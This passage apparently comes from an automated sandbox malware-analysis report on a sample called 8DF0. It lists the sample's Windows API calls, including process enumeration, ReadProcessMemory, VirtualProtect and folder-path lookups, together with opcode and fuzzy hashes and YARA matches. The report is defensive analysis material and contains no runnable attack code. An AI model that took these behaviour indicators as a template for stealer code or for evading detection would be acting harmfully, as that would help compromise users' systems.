                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                    • String ID: vector<T> too long$yxxx$yxxx
                                                    • API String ID: 2884196479-1517697755
                                                    • Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                    • Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
                                                    • Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                    • Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C387
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
                                                    • Instruction ID: 9d86675ad8c32be9e3ed4450e39d87c14e810f662d8174455aae49e1f7a736e6
                                                    • Opcode Fuzzy Hash: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
                                                    • Instruction Fuzzy Hash: CD31AE70E10295ABDF21EFB5DC88A6E7BF6AF49308F04406BE801A7251D7B4C942DF94
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249F0A6
                                                    • lstrlen.KERNEL32(00000000), ref: 0249F0B4
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249F0DB
                                                    • lstrlen.KERNEL32(00000000), ref: 0249F0E2
                                                    • lstrcpy.KERNEL32(00000000,00435550), ref: 0249F116
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcpy$lstrlen
                                                    • String ID:
                                                    • API String ID: 367037083-0
                                                    • Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
                                                    • Instruction ID: cc7a18747186cf37b1a2c6b702b9f9034c66af864c2db7751dc89c32fea10b40
                                                    • Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
                                                    • Instruction Fuzzy Hash: 0D31A271A111946BCB22FF39DC48E9E7FA6AF00308F01442AEC05DBA12EB74D8069F90
                                                    APIs
                                                      • Part of subcall function 024A7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 024A7495
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 024A3C9D
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 024A3CB0
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 024A3CC6
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                    • CloseHandle.KERNEL32(00000000), ref: 024A3DFE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 1066202413-0
                                                    • Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
                                                    • Instruction ID: beacb7f0d724c948cf7c9aa46dd5f1bec475e48726a3c6f9094fa46f46abaee9
                                                    • Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
                                                    • Instruction Fuzzy Hash: AB81E770901215CFC715CF18D998B96BBB2BB54329F29C1EEE4095B3A1E776D882CF90
                                                    APIs
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0249E8F2
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E927
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249E933
                                                    • lstrcat.KERNEL32(?,00638B00), ref: 0249E94C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcat$FolderPathlstrcpy
                                                    • String ID:
                                                    • API String ID: 818526691-0
                                                    • Opcode ID: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
                                                    • Instruction ID: de7a87665bc0a323f6f208f4deb64f4b7c2a632083408dd95fd76cf55e685818
                                                    • Opcode Fuzzy Hash: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
                                                    • Instruction Fuzzy Hash: AF51C571600244AFD754FF64DC41EEE7BAAAF84314F40891FB98983251EE74E909CF92
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 024A2469
                                                    • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 024A2545
                                                    • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 024A25A7
                                                    • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,024A2686), ref: 024A25B9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: MemoryProcessRead$QueryVirtual
                                                    • String ID:
                                                    • API String ID: 268806267-0
                                                    • Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
                                                    • Instruction ID: 8c3188670cf157a6819ab1e1ff792c31dde1e7a18be77bb3c544e9ffaced6568
                                                    • Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
                                                    • Instruction Fuzzy Hash: CF41B071A042199BDB20CFA4D9A4BAF77B6FB94724F14412AED15E7340D370D941DB90
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02484C22
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02484C29
                                                    • strlen.MSVCRT ref: 02484CB6
                                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 02484D37
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: Heap$AllocateProcessProtectVirtualstrlen
                                                    • String ID:
                                                    • API String ID: 2355128949-0
                                                    • Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                    • Instruction ID: 3540da17bdc7f10a15f003eb6127ef4de36cae22e3e2a380fedeff557588b1de
                                                    • Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                    • Instruction Fuzzy Hash: 2E31E920F4833C7F86206BA56C46BDFBED4DF8E760F389053F50856188C9A86405CEEA
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0249803F
                                                      • Part of subcall function 024AA457: std::exception::exception.LIBCMT ref: 024AA46C
                                                      • Part of subcall function 024AA457: __CxxThrowException@8.LIBCMT ref: 024AA481
                                                      • Part of subcall function 024AA457: std::exception::exception.LIBCMT ref: 024AA492
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0249805D
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 02498078
                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,02497F61,00000000,?,?,00000000,?,0248941D,?), ref: 024980DB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
                                                    • String ID:
                                                    • API String ID: 285807467-0
                                                    • Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                    • Instruction ID: 460d250d67548057d60c82658b763e13481bff061abd0a0cd41d904b69fdfa27
                                                    • Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                    • Instruction Fuzzy Hash: 7221D7313007004FD725DE2CDD90A2ABBE6EF96714F214A2FE5458B341D771D841CB55
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 0249836C
                                                    • lstrlen.KERNEL32(00000000), ref: 024983B2
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024983E1
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 024983F9
                                                    • lstrlen.KERNEL32(00000000), ref: 02498437
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02498466
                                                    • strtok_s.MSVCRT ref: 02498476
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcpylstrlenstrtok_s
                                                    • String ID:
                                                    • API String ID: 3280532728-0
                                                    • Opcode ID: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
                                                    • Instruction ID: 445ac715c7424353800aad8691c62f0cae3f52f78918d9722f6b39ddaff52190
                                                    • Opcode Fuzzy Hash: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
                                                    • Instruction Fuzzy Hash: B721E171900245ABCB22DF6CDC48B9EBFB4EF46314F14419EEC499B281EB76D946CB90
                                                    APIs
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0249EF7B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249EFAA
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249EFB8
                                                    • lstrcat.KERNEL32(?,00638930), ref: 0249EFD3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$FolderPathlstrcpy
                                                    • String ID:
                                                    • API String ID: 818526691-0
                                                    • Opcode ID: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
                                                    • Instruction ID: 2985ea93f4bc2a8e7b464b273e7744a12f20c2ffd00f0649aef60acbd3342621
                                                    • Opcode Fuzzy Hash: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
                                                    • Instruction Fuzzy Hash: CC3160B1A11198ABCB10EF74DC44BED7BB6AF48304F10046AEA4997291DBB0AE459F94
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 0249CBCC
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249CC09
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249CC38
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$strtok_s
                                                    • String ID:
                                                    • API String ID: 2610293679-0
                                                    • Opcode ID: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
                                                    • Instruction ID: 2ede88a40ed92a477522c51bb6b111f787dcc6fc374744b7b719b97305dfb4cc
                                                    • Opcode Fuzzy Hash: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
                                                    • Instruction Fuzzy Hash: 42215E71E00258AADB21EFB5DC88AAE7FB59F0C308F04446BD805E7251D774D946DBA4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcessstrtok_s
                                                    • String ID:
                                                    • API String ID: 3407564107-0
                                                    • Opcode ID: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
                                                    • Instruction ID: 1dca685eb130c174b692adbb979f35605a6f91c238c13b7bc5eb49d07455f466
                                                    • Opcode Fuzzy Hash: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
                                                    • Instruction Fuzzy Hash: B4019675900209FFDF10DFA8DC84C9E7BB9EF84304B00447AF90A97200E7759A458BA5
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,0042A400,000000FF), ref: 024A2D96
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2D9D
                                                    • GetLocalTime.KERNEL32(?), ref: 024A2DA9
                                                    • wsprintfA.USER32 ref: 024A2DD5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                    • String ID:
                                                    • API String ID: 377395780-0
                                                    • Opcode ID: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
                                                    • Instruction ID: ef460e4f05b1cc59e4f337cdf8022e820f68ef2e8f2f31b22460d179b2b2908b
                                                    • Opcode Fuzzy Hash: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
                                                    • Instruction Fuzzy Hash: 720112B2904624ABCB149BD9DD45FBFB7BDFB4CB11F00011AF645A2290E7B85940C7B5
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00435204), ref: 0249CCCA
                                                    • StrCmpCA.SHLWAPI(?,00432240,?,00435204), ref: 0249CCE1
                                                    • StrCmpCA.SHLWAPI(?,00435208,?,00432240,?,00435204), ref: 0249CCF8
                                                    • strtok_s.MSVCRT ref: 0249CDEE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strtok_s
                                                    • String ID:
                                                    • API String ID: 3330995566-0
                                                    • Opcode ID: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
                                                    • Instruction ID: 7ae046c56aa34341e63fbfdd5a4472688e45a0aaff0910f287220cd419d8bba9
                                                    • Opcode Fuzzy Hash: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
                                                    • Instruction Fuzzy Hash: 9E01A271A41224A7CF119FA5DC88BDE7FA5AF04705F10405BEC05AB240E7B89646CEA5
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 024A4719
                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 024A4734
                                                    • CloseHandle.KERNEL32(00000000), ref: 024A473B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A476E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                                    • String ID:
                                                    • API String ID: 4028989146-0
                                                    • Opcode ID: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
                                                    • Instruction ID: ee8879669338977e6057005112f777838ef0432c6bf6d4b33f373059c62a1d87
                                                    • Opcode Fuzzy Hash: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
                                                    • Instruction Fuzzy Hash: ADF0F6B49016656FE720AB749D8CBEEBBB9DF15704F1001A5FA45D7280DBF088848BE0
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040880C
                                                    • memcpy.MSVCRT(?,?,00000000,00000000,004077D7), ref: 00408852
                                                      • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_$memcpy
                                                    • String ID: string too long
                                                    • API String ID: 2304785028-2556327735
                                                    • Opcode ID: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
                                                    • Instruction ID: 5d491b80eb8bee1d23d11014c6f0c6c09838216a0de1fe5473ebb2330092f83f
                                                    • Opcode Fuzzy Hash: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
                                                    • Instruction Fuzzy Hash: 9421A1613006504BDB259A6C8B84A2AB7E5AB82700B64493FF0D1D77C1DFB9DC40879D
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 02488B1A
                                                      • Part of subcall function 024AA40A: std::exception::exception.LIBCMT ref: 024AA41F
                                                      • Part of subcall function 024AA40A: __CxxThrowException@8.LIBCMT ref: 024AA434
                                                      • Part of subcall function 024AA40A: std::exception::exception.LIBCMT ref: 024AA445
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                    • String ID: yxxx$yxxx
                                                    • API String ID: 1823113695-1021751087
                                                    • Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                    • Instruction ID: fafc073e34519c1cee4ab1a038e029e19624e8941c2e1c955685c5ae563040f3
                                                    • Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                    • Instruction Fuzzy Hash: 393147B5E005199FCB08DF59C8916AEBBB6EB88310F14826AE915AF344D735A901CBD1
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00408AA5
                                                      • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                      • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                    • memcpy.MSVCRT(?,?,?), ref: 00408AEF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
                                                    • String ID: string too long
                                                    • API String ID: 2475949303-2556327735
                                                    • Opcode ID: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
                                                    • Instruction ID: fcf71bdc140fe32093c9f7753cd2ddaa01766cb0764a4124a3dd8a078f1da807
                                                    • Opcode Fuzzy Hash: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
                                                    • Instruction Fuzzy Hash: C02125727046045BE720CE6DDA4062BB7E6EBD5320F148A3FE885D33C0DF74A9418798
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 024A5BA9
                                                      • Part of subcall function 024AA40A: std::exception::exception.LIBCMT ref: 024AA41F
                                                      • Part of subcall function 024AA40A: __CxxThrowException@8.LIBCMT ref: 024AA434
                                                      • Part of subcall function 024AA40A: std::exception::exception.LIBCMT ref: 024AA445
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 024A5BBC
                                                    Strings
                                                    • Sec-WebSocket-Version: 13, xrefs: 024A5BAE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                    • String ID: Sec-WebSocket-Version: 13
                                                    • API String ID: 963545896-4220314181
                                                    • Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
                                                    • Instruction ID: 3590620c6d25da15b08db0a624057009154c049b5445afc645439f9839185ffb
                                                    • Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
                                                    • Instruction Fuzzy Hash: EB11C2317057408BD3318F2CEA60B0AB7F2ABA1711FA40A6FE091CB784C761D842C790
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00408BBF
                                                      • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                      • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                    • memmove.MSVCRT(?,?,?,?,?,004089E2,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408BF5
                                                    Strings
                                                    • invalid string position, xrefs: 00408BBA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
                                                    • String ID: invalid string position
                                                    • API String ID: 655285616-1799206989
                                                    • Opcode ID: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
                                                    • Instruction ID: 1be7ab364882a8fa79e272fabefde4f39cec4c957e742b5a331aa6ba38d6d88d
                                                    • Opcode Fuzzy Hash: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
